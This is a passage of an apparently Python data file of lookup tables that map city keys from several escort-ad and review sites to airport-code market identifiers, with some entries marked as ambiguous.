"munich": "MUC",
"muskegon": "MKG",
"myrtle-beach": "MYR",
"nanaimo": "YCD",
"nashville": "BNA",
"new-brunswick": "YQM",
"new-delhi": "DEL",
"new-hampshire": "MHT",
"new-haven": "HVN",
"new-orleans": "MSY",
"new-york": "JFK",
"newcastle": "NCL",
"newfoundland": "YYT",
"niagara": "YCM",
"norfolk": "ORF",
"north-dakota": "FAR",
"north-jersey": "EWR",
"norwich": "NWI",
"nottingham": "NQT",
"oakland": "OAK",
"ocala": "OCF",
"odessa": "MAF",
"ogden-clearfield": "OGD",
"oklahoma-city": "OKC",
"omaha": "OMA",
"orange-county": "SNA",
"orlando": "MCO",
"oslo": "OSL",
"ottawa": "YOW",
"outer-banks": "FFA",
"owen-sound": "YOS",
"oxford": "OXF",
"palm-springs-ca": "PSP",
"panama-city-fl": "PFN",
"paris": "CDG",
"parkersburg-marietta": "PKB",
"pensacola": "PNS",
"peoria": "PIA",
"peterborough": "YPQ",
"philadelphia": "PHL",
"phoenix": "PHX",
"pittsburgh": "PIT",
"plattsburgh-adirondacks": "PBG",
"poconos": "MPO",
"port-huron": "PHN",
"portland": "PDX",
"prescott": "PRC",
"prince-george": "YXS",
"providence": "PVD",
"provo": "PVU",
"pueblo": "PUB",
"pullman": "PUW",
"quebec": "YQB",
"queens": "JFK",
"raleigh": "RDU",
"reading": "RDG",
"red-deer": "YQF",
"redding": "RDD",
"regina": "YQR",
"reno": "RNO",
"richmond": "RIC",
"roanoke": "ROA",
"rochester-mn": "RST",
"rochester-ny": "ROC",
"rockford": "RFD",
"rocky-mountains": "EGE",
"roseburg": "RBG",
"roswell": "ROW",
"sacramento": "SMF",
"saginaw-midland-baycity": "MBS",
"saguenay": "YBG",
"saint-louis": "STL",
"salem-or": "SLE",
"salt-lake-city": "SLC",
"san-antonio": "SAT",
"san-diego": "SAN",
"san-fernando-valley": "BUR",
"san-francisco": "SFO",
"san-jose": "SJC",
"san-luis-obispo": "SBP",
"san-marcos": "HYI",
"sandusky": "SKY",
"santa-barbara": "SBA",
"santa-fe": "SAF",
"sarasota-bradenton": "SRQ",
"sarnia": "YZR",
"saskatchewan": "YXE",
"savannah": "SAV",
"scranton": "AVP",
"seattle": "SEA",
"sheboygan-wi": "SBM",
"sheffield": "DSA",
"sherbrooke": "YSC",
"shreveport": "SHV",
"sierra-vista": "FHU",
"sioux-city-ia": "SUX",
"skagit": "BVS",
"south-bend": "SBN",
"south-dakota": "PIR",
"south-jersey": "MIV",
"space-coast": "TIX",
"spokane": "GEG",
"springfield-il": "SPI",
"springfield-ma": "CEF",
"springfield-mo": "SGF",
"st-augustine": "UST",
"st-cloud": "STC",
"st-george": "SGU",
"stillwater": "SWO",
"stockton": "SCK",
"sudbury": "YSB",
"syracuse": "SYR",
"tallahassee": "TLH",
"tampa": "TPA",
"terre-haute": "HUF",
"territories": "YZF",
"texarkana": "TXK",
"thunder-bay": "YQT",
"toledo": "TOL",
"topeka": "FOE",
"toronto": "YYZ",
"treasure-coast": "VRB",
"tucson": "TUS",
"tulsa": "TUL",
"tuscaloosa": "TCL",
"twin-falls": "TWF",
"tyler": "TYR",
"utica": "UCA",
"valdosta": "VLD",
"vancouver": "YVR",
"ventura-county": "OXR",
"vermont": "BTV",
"victoria": "YYJ",
"victoria-tx": "VCT",
"virginia-beach": "ORF",
"visalia-tulare": "VIS",
"waco": "ACT",
"washington-dc": "IAD",
"waterloo": "ALO",
"watertown": "ART",
"wausau": "AUW",
"wenatchee": "EAT",
"west-palm-beach": "PBI",
"wheeling-wv": "HLG",
"whistler": "YWS",
"wichita": "ICT",
"wichita-falls": "SPS",
"williamsport": "IPT",
"wilmington-nc": "ILM",
"windsor": "YQG",
"winnipeg": "YWG",
"winston-salem": "INT",
"worcester": "ORH",
"wyoming": "CPR",
"yakima": "YKM",
"york-pa": "THV",
"youngstown": "YNG",
"yuba-sutter": "MYV",
"yuma": "YUM"}
# naughtyreviews_sitekey_to_marketid
naughtyreviews_sitekey_to_marketid = {
("london",): "LHR",
# springfield ambiguous
("toronto",): "YYZ",
("detroit",): "DTW",
("atlanta",): "ATL",
("phoenix",): "PHX",
("dallas",): "DFW",
# columbus ambiguous
("portland",): "PDX",
("vancouver",): "YVR",
("miami",): "MIA",
("boston",): "BOS",
# birmingham ambiguous
("denver",): "DEN",
# columbia ambiguous
("houston",): "IAH",
("tampa",): "TPA",
# manchester ambiguous
("cleveland",): "CLE",
# charleston ambiguous
# wilmington ambiguous
("orlando",): "MCO",
("minneapolis",): "MSP",
("chicago",): "ORD",
("indianapolis",): "IND",
# rochester ambiguous
("pittsburgh",): "PIT",
("sacramento",): "SMF",
("cincinnati",): "CVG",
("paris",): "CDG",
# lafayette ambiguous
("nashville",): "BNA",
("baltimore",): "BWI",
("louisville",): "SDF",
("austin",): "AUS",
# fayetteville ambiguous
("cambridge",): "CBG",
("philadelphia",): "PHL",
("seattle",): "SEA",
("montreal",): "YUL",
("jackson",): "JAN",
("ottawa",): "YOW",
("charlotte",): "CLT",
("leicester",): "EMA",
# bloomington ambiguous
("southampton",): "SOU",
("milwaukee",): "MKE",
("jacksonville",): "JAX",
("calgary",): "YYC",
("tulsa",): "TUL",
("wichita",): "ICT",
("hamilton",): "YHM",
("eugene",): "EUG",
("albuquerque",): "ABQ",
("greensboro",): "GSO",
("amsterdam",): "AMS",
("memphis",): "MEM",
("leeds",): "LBA",
("albany",): "ALB",
("berlin",): "TXL",
("edmonton",): "YEG",
("bogota",): "BOG",
("raleigh",): "RDU",
("toledo",): "TOL",
("dusseldorf",): "DUS",
("kitchener",): "YKF",
("kiev",): "IEV",
("akron",): "CAK",
("asheville",): "AVL",
("fargo",): "FAR",
("biloxi",): "GPT",
("omaha",): "OMA",
("buffalo",): "BUF",
("brussels",): "BRU",
("medford",): "MFR",
("vienna",): "VIE",
("madison",): "MSN",
("milan",): "MXP",
("minot",): "MOT",
("dublin",): "DUB",
("greenville",): "GSP",
("lexington",): "LEX",
("sarasota",): "SRQ",
("madrid",): "MAD",
("bend",): "RDM",
("tokyo",): "NRT",
("hartford",): "HFD",
("reno",): "RNO",
("tallahassee",): "TLH",
("dayton",): "DAY",
("fredericksburg",): "EZF",
("caracas",): "CCS",
("knoxville",): "TYS",
("munich",): "MUC",
("bucharest",): "OTP",
("lisbon",): "LIS",
("warsaw",): "WAW",
("providence",): "PVD",
("brighton",): "ESH",
("lyon",): "LYS",
("savannah",): "SAV",
("chattanooga",): "CHA",
("tucson",): "TUS",
("barrie",): "QEB",
("halifax",): "YHZ",
("delhi",): "DEL",
("prague",): "PRG",
("shreveport",): "SHV",
("sydney",): "SYD",
("macon",): "MCN",
("brisbane",): "BNE",
("perth",): "PER",
("helsinki",): "HEL",
("zurich",): "ZRH",
("melbourne",): "MEL",
("amarillo",): "AMA",
("florence",): "FLO",
("pensacola",): "PNS",
("palmdale",): "PMD",
("missoula",): "MSO",
("sofia",): "SOF",
("stockholm",): "ARN",
("hampton",): "ORF",
("barcelona",): "BCN",
("moscow",): "SVO",
("naples",): "NAP",
("belfast",): "BFS",
("porto",): "OPO",
("richmond",): "RIC",
("dubai",): "DXB",
("newark",): "EWR",
("rome",): "FCO",
("worcester",): "ORH",
("frederick",): "FDK",
("newcastle",): "NCL",
("edinburgh",): "EDI",
("kolkata",): "CCU",
("bahia",): "SSA",
("hamburg",): "HAM",
("harrisburg",): "MDT",
("huntsville",): "HSV",
("burlington",): "BTV",
("istanbul",): "IST",
("nice",): "NCE",
("martinsburg",): "MRB",
("marseille",): "MRS",
("kelowna",): "YLW",
("gainesville",): "GNV",
("budapest",): "BUD",
("johannesburg",): "JNB",
("bristol",): "BRS",
("yuma",): "YUM",
("copenhagen",): "CPH",
("bangkok",): "BKK",
("quito",): "UIO",
("bellingham",): "BLI",
("shanghai",): "SHA",
("glasgow",): "GLA",
("lincoln",): "LNK",
("auckland",): "AKL",
("tijuana",): "TIJ",
("victoria",): "YYJ",
("arlington",): "IAD",
("oslo",): "OSL",
("youngstown",): "YNG",
("manila",): "MNL",
("windsor",): "YQG",
("roanoke",): "ROA",
("lima",): "LIM",
("flagstaff",): "FLG",
("santiago",): "SCL",
("chelmsford",): "STN",
("medellin",): "MDE",
("coventry",): "CVT",
("norfolk",): "ORF",
("rotterdam",): "RTM",
("chico",): "CIC",
("annapolis",): "ANP",
("honolulu",): "HNL",
("allentown",): "ABE",
("evansville",): "EVV",
("clarksville",): "CKV",
("morgantown",): "MGW",
("montgomery",): "MGM",
("winnipeg",): "YWG",
("frankfurt",): "FRA",
("joplin",): "JLN",
("bangalore",): "BLR",
("duluth",): "DLH",
("maracaibo",): "MAR",
("poughkeepsie",): "SWF",
("syracuse",): "SYR",
("beijing",): "PEK",
("modesto",): "MOD",
("cali",): "CLO",
("cancun",): "CUN",
("christchurch",): "CHC",
("sheffield",): "DSA",
("kingston",): "YGK",
("boise",): "BOI",
("mumbai",): "BOM",
("trenton",): "47N",
("kalamazoo",): "AZO",
("wellington",): "WLG",
("bismarck",): "BIS",
("concord",): "MHT",
("norwich",): "NWI",
("brazilia",): "BSB",
("liverpool",): "LPL",
("osaka",): "KIX",
("scranton",): "AVP",
("anchorage",): "ANC",
("singapore",): "SIN",
("hagerstown",): "HGR",
("topeka",): "FOE",
("oakland",): "OAK",
("strasbourg",): "SXB",
("davenport",): "MLI",
("cordoba",): "COR",
("saginaw",): "MBS",
("richland",): "PSC",
("bangor",): "PWM",
("guangzhou",): "CAN",
("mendoza",): "MDZ",
("bakersfield",): "BFL",
("waco",): "ACT",
("hyderabad",): "HYD",
("jakarta",): "CGK",
("moncton",): "YQM",
("asuncion",): "ASU",
("erie",): "ERI",
("fresno",): "FAT",
("augusta",): "AGS",
("spokane",): "GEG",
("lubbock",): "LBB",
("lansing",): "LAN",
("racine",): "RAC",
("bridgeport",): "BDR",
("seoul",): "ICN",
("butte",): "BTM",
# fayettville ambiguous
("tacoma",): "TCM",
("mobile",): "MOB",
("odessa",): "MAF",
("hattiesburg",): "HBG",
("casper",): "CPR",
("binghamton",): "BGM",
("champaign",): "CMI",
("billings",): "BIL",
("maui",): "OGG",
("boulder",): "WBU",
("flint",): "FNT",
("peoria",): "PIA",
("spartanburg",): "GSP",
("rockford",): "RFD",
("tuscaloosa",): "TCL",
("helena",): "HLN",
("stockton",): "SCK",
("kamloops",): "YKA",
("reading",): "RDG",
("monterey",): "MRY",
("stamford",): "HPN",
("regina",): "YQR",
("saskatoon",): "YXE",
("hammond",): "ORD",
("kokomo",): "OKK",
("bismark",): "BIS",
("frankurt",): "FRA",
("washington",): "IAD",
("charlottetown",): "YYG",
("hagatna",): "GUM",
("barre",): "BTV",
("roma",): "RMG",
("Leicester",): "EMA",
("nottingham",): "NQT",
("pittsburg",): "PIT",
("hollywood",): "BUR",
("santafe",): "SAF",
# 2-WORD city names
("las", "vegas",): "LAS",
("los", "angeles",): "LAX",
("new", "york",): "JFK",
("san", "diego",): "SAN",
("palm", "beach",): "PBI",
("new", "orleans",): "MSY",
("st", "louis",): "STL",
("kansas", "city",): "MCI",
("washington", "dc",): "MWH",
("san", "jose",): "SJC",
("san", "francisco",): "SFO",
("panama", "city",): "PFN",
("orange", "county",): "SNA",
("san", "antonio",): "SAT",
("fort", "lauderdale",): "FLL",
("oklahoma", "city",): "OKC",
("central", "jersey",): "47N",
("grand", "rapids",): "GRR",
("myrtle", "beach",): "MYR",
("lake", "city",): "LCQ",
("des", "moines",): "DSM",
("daytona", "beach",): "DAB",
("baton", "rouge",): "BTR",
("south", "bend",): "SBN",
("green", "bay",): "GRB",
("kuala", "lumpur",): "KUL",
("fort", "myers",): "RSW",
("colorado", "springs",): "COS",
("long", "island",): "ISP",
("san", "juan",): "SJU",
("niagara", "falls",): "YCM",
("virginia", "beach",): "ORF",
("sioux", "falls",): "FSD",
("saint", "petersburg",): "LED",
("red", "deer",): "YQF",
("st", "cloud",): "STC",
("sao", "paulo",): "GRU",
("charlotte", "amalie",): "STT",
("little", "rock",): "LIT",
("ft", "mcmurray",): "YMM",
("new", "haven",): "HVN",
("buenos", "aires",): "EZE",
("mexico", "city",): "MEX",
("atlantic", "city",): "ACY",
("cape", "town",): "CPT",
("fort", "wayne",): "FWA",
("el", "paso",): "ELP",
("hilton", "head",): "HHH",
("inland", "empire",): "ONT",
("key", "west",): "EYW",
("lake", "charles",): "LCH",
("jersey", "city",): "EWR",
("hong", "kong",): "HKG",
("fort", "collins",): "FNL",
("santa", "barbara",): "SBA",
("corpus", "christi",): "CRP",
("la", "crosse",): "LSE",
("boca", "raton",): "FLL",
("northern", "virginia",): "IAD",
("rapid", "city",): "RAP",
("ann", "arbor",): "ARB",
("palm", "springs",): "PSP",
("taipei", "city",): "TPE",
("cedar", "rapids",): "CID",
("tel", "aviv",): "TLV",
("sioux", "city",): "SUX",
("great", "falls",): "GTF",
("long", "beach",): "LGB",
("terre", "haute",): "HUF",
("ventura", "county",): "OXR",
("fort", "smith",): "FSM",
("traverse", "city",): "TVC",
("st", "john",): "YQM",
("bowling", "green",): "BWG",
("santa", "fe",): "SAF",
("junction", "city",): "MHK",
# 3-WORD city names
("san", "fernando", "valley",): "BUR",
("salt", "lake", "city",): "SLC",
("salvador", "de", "bahia",): "SSA",
("rio", "de", "janeiro",): "GIG",
("west", "palm", "beach",): "PBI",
("st", "john", "s",): "YYT",
("ho", "chi", "minh",): "SGN",
("san", "gabriel", "valley",): "EMT",
("rio", "grande", "valley",): "BRO"
}
# cityvibe_sitekey_to_marketid
cityvibe_sitekey_to_marketid = {
"auburn": "AUO",
"birmingham": "BHM",
"gadsden": "GAD",
"huntsville": "HSV",
"montgomery": "MGM",
"mobile": "MOB",
"anchorage": "ANC",
"phoenix": "PHX",
"flagstaff": "FLG",
"mohavecounty": "IFP",
"scottsdale": "PHX",
"tucson": "TUS",
"yuma": "YUM",
"fayettevillear": "XNA",
"fortsmith": "FSM",
"littlerock": "LIT",
"losangeles": "LAX",
"sangabrielvalley": "EMT",
"orangecounty": "SNA",
"sanfrancisco": "SFO",
"inlandempire": "ONT",
"bakersfield": "BFL",
"sanmateo": "SQL",
"santacruz": "WVI",
"sandiego": "SAN",
"santabarbara": "SBA",
"sanfernandovalley": "BUR",
"ventura": "OXR",
"santaclara": "SJC",
"sacramento": "SMF",
"chico": "CIC",
"fresno": "FAT",
"northbayca": "STS",
"mendocinocounty": "UKI",
"humboldtcounty": "ACV",
"imperialcounty": "IPL",
"palmdale": "PMD",
"longbeach": "LGB",
"lasvegas": "LAS",
"modesto": "MOD",
"monterey": "MRY",
"sanjose": "SJC",
"santamaria": "SMX",
"napa": "STS",
"oakland": "OAK",
"palmsprings": "PSP",
"sanluisobispo": "SBP",
"santarosa": "STS",
"southlaketahoe": "RNO",
"tahoe": "RNO",
"visalia": "VIS",
"denver": "DEN",
"boulder": "WBU",
"rockies": "EGE",
"coloradosprings": "COS",
"fortcollins": "FNL",
"westernslope": "GJT",
"pueblo": "PUB",
"hartford": "HFD",
"newhaven": "HVN",
"easternconnecticut": "GON",
"northwestconnecticut": "DXR",
"washington": "IAD",
"dover": "ILG",
"newarkde": "ILG",
"wilmingtonde": "ILG",
"orlando": "MCO",
"fortlauderdale": "FLL",
"tampa": "TPA",
"spacecoast": "TIX",
"miami": "MIA",
"ocala": "OCF",
"daytonabeach": "DAB",
"pensacola": "PNS",
"fortmyers": "RSW",
"gainesville": "GNV",
"jacksonville": "JAX",
"westpalmbeach": "PBI",
"lakeland": "LAL",
"panamacity": "PFN",
"sarasota": "SRQ",
"staugustine": "UST",
"stpetersburg": "TPA",
"tallahassee": "TLH",
"albanyga": "ABY",
"treasurecoast": "VRB",
"atlanta": "ATL",
"athens": "ATH",
"augusta": "AGS",
"savannah": "SAV",
"columbusga": "CSG",
"northwestgeorgia": "RMG",
"statesboro": "TBR",
"hawaii": "KOA",
"honolulu": "HNL",
"maui": "OGG",
"boise": "BOI",
"chicago": "ORD",
"rockford": "RFD",
"bloomington": "BMI",
"chambana": "CMI",
"mattoon": "MTO",
"decaturil": "DEC",
"dixonil": "RFD",
"lasallecounty": "VYS",
"peoria": "PIA",
"naperville": "ORD",
"springfieldil": "SPI",
"eastchicago": "ORD",
"fortwayne": "FWA",
"indianapolis": "IND",
"lafayette": "LAF",
"merrillville": "ORD",
"newalbany": "SDF",
"southbend": "SBN",
"terrehaute": "HUF",
"desmoines": "DSM",
"cedarrapids": "CID",
"councilbluffs": "OMA",
"davenport": "MLI",
"iowacity": "IOW",
"dubuqueia": "DBQ",
"siouxcity": "SUX",
"waterloo": "ALO",
"lawrence": "LWC",
"manhattanks": "MHK",
"shawnee": "MCI",
"topeka": "FOE",
"wichita": "ICT",
"lexington": "LEX",
"louisville": "SDF",
"owensboro": "OWB",
"shepherdsville": "SDF",
"alexandriala": "ESF",
"batonrouge": "BTR",
"lafayettela": "LFT",
"lakecharles": "LCH",
"neworleans": "MSY",
"shreveport": "SHV",
"maine": "PWM",
"portlandme": "PDX",
"baltimore": "BWI",
"southernmaryland": "2W6",
"collegepark": "IAD",
"cumberlandvalley": "CBE",
"frederick": "FDK",
"westernmaryland": "CBE",
"silverspring": "IAD",
"springfield": "CEF",
"boston": "BOS",
"capecod": "PVC",
"southcoast": "EWB",
"manchesterma": "BOS",
"worcester": "ORH",
"annarbor": "ARB",
"battlecreek": "AZO",
"detroit": "DTW",
"flint": "FNT",
"grandrapids": "GRR",
"jackson": "JXN",
"kalamazoo": "AZO",
"lansing": "LAN",
"monroemi": "TTF",
"northernmichigan": "TVC",
"minneapolis": "MSP",
"duluthmn": "DLH",
"rochestermn": "RST",
"stcloud": "STC",
"biloxi": "GPT",
"northmississippi": "TUP",
"jacksonms": "JAN",
"hattiesburg": "HBG",
"meridian": "MEI",
"saintlouis": "STL",
"columbiamo": "COU",
"joplin": "JLN",
"kansascity": "MCI",
"lakeoftheozarks": "AIZ",
"billings": "BIL",
"grandisland": "GRI",
"greatfalls": "GTF",
"lincoln": "LNK",
"omaha": "OMA",
"elko": "EKO",
"reno": "RNO",
"concordnh": "MHT",
"manchester": "MHT",
"merrimack": "MHT",
"nashua": "MHT",
"newhampshirenh": "MHT",
"southjersey": "MIV",
"northjersey": "EWR",
"centraljersey": "47N",
"jerseyshore": "ACY",
"mountlaurel": "PHL",
"secaucus": "EWR",
"albuquerque": "ABQ",
"farmington": "FMN",
"santafe": "SAF",
"albany": "ALB",
"queens": "JFK",
"brooklyn": "JFK",
"longisland": "ISP",
"bronx": "JFK",
"buffalo": "BUF",
"chautauqua": "JHW",
"westchesterny": "HPN",
"hudsonvalley": "SWF",
"ithaca": "ITH",
"manhattan": "JFK",
"newyork": "JFK",
"rochester": "ROC",
"plattsburgh": "PBG",
"ronkonkoma": "ISP",
"statenisland": "JFK",
"syracuse": "SYR",
"watertown": "ART",
"asheville": "AVL",
"charlotte": "CLT",
"raleigh": "RDU",
"easternnorthcarolina": "PGV",
"fayetteville": "FAY",
"greensboro": "GSO",
"wilmington": "ILM",
"bismarck": "BIS",
"fargo": "FAR",
"grandforks": "GFK",
"minot": "MOT",
"northdakota": "FAR",
"akron": "CAK",
"ashtabula": "HZY",
"cincinnati": "CVG",
"cleveland": "CLE",
"columbus": "CMH",
"dayton": "DAY",
"ohio": "CMH",
"toledo": "TOL",
"youngstown": "YNG",
"oklahomacity": "OKC",
"tulsa": "TUL",
"bend": "RDM",
"eugene": "EUG",
"medford": "MFR",
"portland": "PDX",
"salem": "SLE",
"allentown": "ABE",
"altoona": "AOO",
"philadelphia": "PHL",
"pittsburgh": "PIT",
"harrisburg": "MDT",
"lancaster": "LNS",
"poconos": "MPO",
"scranton": "AVP",
"reading": "RDG",
"williamsport": "IPT",
"york": "THV",
"providence": "PVD",
"pawtucket": "PVD",
"charleston": "CHS",
"columbia": "CAE",
"florencesc": "FLO",
"greenville": "GSP",
"myrtlebeach": "MYR",
"fortpierre": "PIR",
"rapidcity": "RAP",
"chattanooga": "CHA",
"clarksville": "CKV",
"cookeville": "SRB",
"memphis": "MEM",
"tricitiestn": "TRI",
"knoxville": "TYS",
"nashville": "BNA",
"abilene": "ABI",
"amarillo": "AMA",
"dallas": "DFW",
"austin": "AUS",
"beaumont": "BPT",
"fortworth": "DFW",
"collegestation": "CLL",
"corpuschristi": "CRP",
"denton": "DFW",
"elpaso": "ELP",
"galveston": "GLS",
"houston": "IAH",
"huntsvilletx": "UTS",
"killeen": "GRK",
"laredo": "LRD",
"tyler": "TYR",
"lubbock": "LBB",
"mcallen": "MFE",
"odessa": "MFA",
"sanantonio": "SAT",
"sanmarcos": "HYI",
"texarkana": "TXK",
"waco": "ACT",
"victoria": "VCT",
"wichitafalls": "SPS",
"saltlakecity": "SLC",
"ogden": "OGD",
"provo": "PVU",
"stgeorge": "SGU",
"brattleboro": "BTV",
"burlington": "BTV",
"northernvirginia": "IAD",
"arlington": "IAD",
"fredericksburg": "EZF",
"hamptonva": "ORF",
"newportnews": "ORF",
"norfolk": "ORF",
"richmond": "RIC",
"roanoke": "ROA",
"virginiabeach": "ORF",
"seattle": "SEA",
"bellingham": "BLI",
"everett": "PAE",
"tacoma": "TCM",
"tricities": "PSC",
"moseslake": "MWH",
"mtvernon": "BVS",
"spokane": "GEG",
"yakima": "YKM",
"charlestonwv": "CRW",
"martinsburg": "MRB",
"morgantown": "MGW",
"greenbay": "GRB",
"racine": "RAC",
"madison": "MSN",
"milwaukee": "MKE",
"sheboygan": "SBM",
"wyoming": "CPR",
"calgary": "YYC",
"edmonton": "YEG",
"ftmcmurray": "YMM",
"lethbridge": "YQL",
"reddeer": "YQF",
"abbotsford": "YXX",
"burnaby": "YVR",
"comoxvalley": "YQQ",
"kelowna": "YLW",
"langley": "YXX",
"kamloops": "YKA",
"nanaimo": "YCD",
"princegeorge": "YXS",
"richmondbc": "YVR",
"surrey": "YVR",
"vancouver": "YVR",
"victoriaca": "YYJ",
"whistler": "YWS",
"winnipeg": "YWG",
"fredericton": "YQM",
"moncton": "YQM",
"newbrunswickca": "YQM",
"stjohnscanl": "YYT",
"yellowknife": "YZF",
"halifax": "YHZ",
"barrie": "QEB",
"brampton": "YYZ",
"burlingtonca": "YHM",
"etobicoke": "YYZ",
"guelph": "CNC4",
"hamilton": "YHM",
"kingstonca": "YGK",
"kitchener": "YKF",
"londonca": "YXU",
"markham": "YYZ",
"mississauga": "YYZ",
"newmarket": "YYZ",
"niagarafallsca": "YCM",
"northbay": "YYB",
"northyork": "YYZ",
"oshawa": "YYZ",
"ottawa": "YOW",
"peterbourough": "YPQ",
"pickering": "YYZ",
"richmondhill": "YYZ",
"saultstemarie": "YAM",
"scarborough": "YYZ",
"stcatharines": "YCM",
"toronto": "YYZ",
"sudbury": "YSB",
"thunderbay": "YQT",
"vaughan": "YYZ",
"windsor": "YQG",
"woodbridgeca": "YYZ",
"yorkca": "YYZ",
"dorval": "YUL",
"gatineau": "YUL",
"laval": "YUL",
"longueuil": "YUL",
"montreal": "YUL",
"quebec": "YQB",
"quebeccity": "YQB",
"regina": "YQR",
"saskatoon": "YXE",
"whitehorse": "YXY",
"aberdeen": "ABZ",
"birminghamgb": "BHX",
"brighton": "ESH",
"bristolgb": "BRS",
"cambridgegb": "CBG",
"devon": "EXT",
"eastanglia": "NWI",
"eastmidlands": "EMA",
"edinburgh": "EDI",
"glasgow": "GLA",
"hampshire": "SOU",
"leeds": "LBA",
"liverpool": "LPL",
"london": "LHR",
"manchestergb": "MAN",
"newcastle": "NCL",
"oxford": "OXF",
"sheffield": "DSA",
"wales": "CWL",
"abudhabi": "AUH",
"dubai": "DXB",
"amman": "AMM",
"bahamas": "NAS",
"caribbean": "KIN",
"dominicanrepublic": "SDQ",
"puertorico": "SJU",
"jamaica": "KIN",
"virginislands": "STT",
"bangkok": "BKK",
"duesseldorf": "DUS",
"berlinde": "TXL",
"frankfurt": "FRA",
"hamburg": "HAM",
"muenchen": "MUC",
"koeln": "CGN",
"cabosanlucas": "SJD",
"mexicocity": "MEX",
"cancun": "CUN",
"tijuana": "TIJ",
"bajasur": "SJD",
"pv": "PVR",
"cebu": "CEB",
"doha": "DOH",
"manila": "MNL",
"hongkong": "HKG",
"kuwait": "KWI",
"iceland": "RKV",
"luxembourg": "LUX",
"manama": "BAH",
"moskva": "SVO",
"shanghai": "SHA",
"singapore": "SIN",
"ahmedabad": "AMD",
"bangalore": "BLR",
"chandigarh": "IXC",
"chennai": "MAA",
"delhi": "DEL",
"goa": "GOI",
"hyderabad": "HYD",
"india": "DEL",
"kolkata": "CCU",
"kerala": "TRV",
"indore": "IDR",
"mumbai": "BOM",
"pune": "PNQ",
"surat": "STV",
"amsterdam": "AMS",
"athina": "ATH",
"christchurch": "CHC",
"baleares": "PMI",
"wellington": "WLG",
"auckland": "AKL",
"barcelona": "BCN",
"madrid": "MAD",
"malaga": "AGP",
"brasilia": "BSB",
"balgariya": "SOF",
"portoalegre": "POA",
"riodejaneiro": "GIG",
"recife": "REC",
"salvador": "SSA",
"saopaulo": "GRU",
"canberra": "CBR",
"melbourneau": "MEL",
"perth": "PER",
"sydney": "SYD",
"brussel": "BRU",
"bucuresti": "OTP",
"budapest": "BUD",
"buenosaires": "EZE",
"capetown": "CPT",
"johannesburg": "JNB",
"colombia": "BOG",
"costarica": "SJO",
"genf": "GVA",
"zurich": "ZRH",
"grenoble": "GNB",
"lille": "LIL",
"lyon": "LYS",
"nice": "NCE",
"paris": "CDG",
"helsinki": "HEL",
"guam": "GUM",
"istanbul": "IST",
"telaviv": "TLV",
"kobenhavn": "CPH",
"porto": "OPO",
"lisboa": "LIS",
"milano": "MXP",
"roma": "FCO",
"sardegna": "CAG",
"tokyo": "NRT",
"osaka-kobe-kyoto": "KIX",
"oslo": "OSL",
"praha": "PRG",
"santiago": "SCL",
"seoul": "ICN",
"warszawa": "WAW",
"wien": "VIE",
"coquitlam": "YVR",
"parkersburgoh": "PKB",
"chambersburg": "N68",
"newrivervalley": "BCB",
"medicinehat": "YXH",
"cariboo": "YXS",
"chilliwack": "YXX",
"cranbrook": "YXC",
"peacerivercounty": "YPE",
"skeena": "XCM",
"sunshinecoast": "YHS",
"bellevilleca": "YTR",
"brantford": "YFD",
"chatham": "XCM",
"cornwall": "YCC",
"oakville": "YYZ",
"owensound": "YOS",
"sarnia": "YZR",
"saguenay": "YBG",
"sherbrooke": "YSC",
"troisrivieres": "YRQ",
"kaiserslautern": "RMS",
"nuernberg": "NUE",
"veracruz": "VER",
"jaipur": "JAI",
"belfast": "BFS",
"dublinie": "DUB",
"brisbane": "BNE",
"durban": "DUR",
"caracas": "CCS",
"marseille": "MRS",
"guatemala": "GUA",
"jerusalem": "JRS",
"lapaz": "LPB",
"montevideo": "MVD",
"okinawa": "OKA",
"quito": "UIO",
"stockholm": "ARN",
"palmharbor": "TPA",
"clearwater": "TPA",
"saintpetersburg": "TPA",
"brandon": "YXU",
"redding": "RDD",
"cupertino": "SJC",
"sunnyvale": "SJC",
"paloalto": "SJC",
"alpharetta": "ATL",
"dunwoody": "ATL",
"stonemountain": "ATL",
"duluth": "ATL",
"rosemead": "EMT",
"pasadena": "EMT",
"sangabriel": "EMT",
"baldwinpark": "EMT",
"lapuente": "EMT",
"westcovina": "EMT",
"elmonte": "EMT",
"sandimas": "EMT",
"yuba": "MYV",
"oldtown": "STS",
"roseville": "SMF",
"hollywoodfl": "FLL",
"bocaraton": "FLL",
"pompanobeach": "FLL",
"greatneck": "JFK",
"bohemia": "ISP",
"bellport": "ISP",
"commack": "ISP",
"jacksontn": "MKL",
"ames": "AMW",
"sparks": "RNO",
"anaheim": "SNA",
"costamesa": "SNA",
"fullerton": "SNA",
"yorbalinda": "SNA",
"newportbeach": "SNA",
"irvine": "SNA",
"sanjuancapistrano": "SNA",
"alisoviejo": "SNA",
"hinesville": "SAV",
"vallejo": "OAK",
"vacaville": "SMF",
"rohnertpark": "STS"}
# escortsincollege_sitekey_to_marketid
escortsincollege_sitekey_to_marketid = {
"Abbotsford, British Columbia": "YXX",
"Abilene, Texas": "ABI",
"Akron, Ohio": "CAK",
"Albany, New York": "ALB",
"Albuquerque, New Mexico": "",
"Allentown, Pennsylvania": "ABE",
"Altoona, Pennsylvania": "AOO",
"Amarillo, Texas": "AMA",
"Anchorage, Alaska": "ANC",
"Ann Arbor, Michigan": "",
"Annapolis, Maryland": "ANP",
"Appleton, Wisconsin": "ATW",
"Asheville, North Carolina": "AVL",
"Ashland, Ohio": "HTS",
"Ashtabula, Ohio": "HZY",
"Athens, Ohio": "ATO",
"Atlanta, Georgia": "ATL",
"Auburn, Alabama": "AUO",
"Augusta, Georgia": "AGS",
"Austin, Texas": "AUS",
"Bakersfield, California": "BFL",
"Baltimore, Maryland": "BWI",
"Barrie, Ontario": "QEB",
"Baton Rouge, Louisiana": "",
"Battle Creek, Michigan": "AZO",
"Beaumont, Texas": "BPT",
"Belleville, Ontario": "YTR",
"Bellingham, Washington": "BLI",
"Bend, Oregon": "RDM",
"Bigisland, Hawaii": "KOA",
"Biloxi, Mississippi": "GPT",
"Binghamton, New York": "BGM",
"Birmingham, Alabama": "BHM",
"Blacksburg, Virginia": "BCB",
"Bloomington, Indiana": "BMG",
"Boise, Idaho": "BOI",
"Boone, North Carolina": "NC06",
"Boston, Massachusetts": "BOS",
"Boulder, Colorado": "WBU",
"Bowling Green, Kentucky": "BWG",
"Brantford, Ontario": "YFD",
"Brownsville, Texas": "BRO",
"Brunswick, Georgia": "BQK",
"Buffalo, New York": "BUF",
"Calgary, Alberta": "YYC",
"Cape Cod, Massachusetts": "PVC",
"Carbondale, Illinois": "MDH",
"Cariboo, British Columbia": "YXS",
"Catskills, New York": "20N",
"Cedar Rapids, Iowa": "CID",
"Central Jersey, New Jersey": "47N",
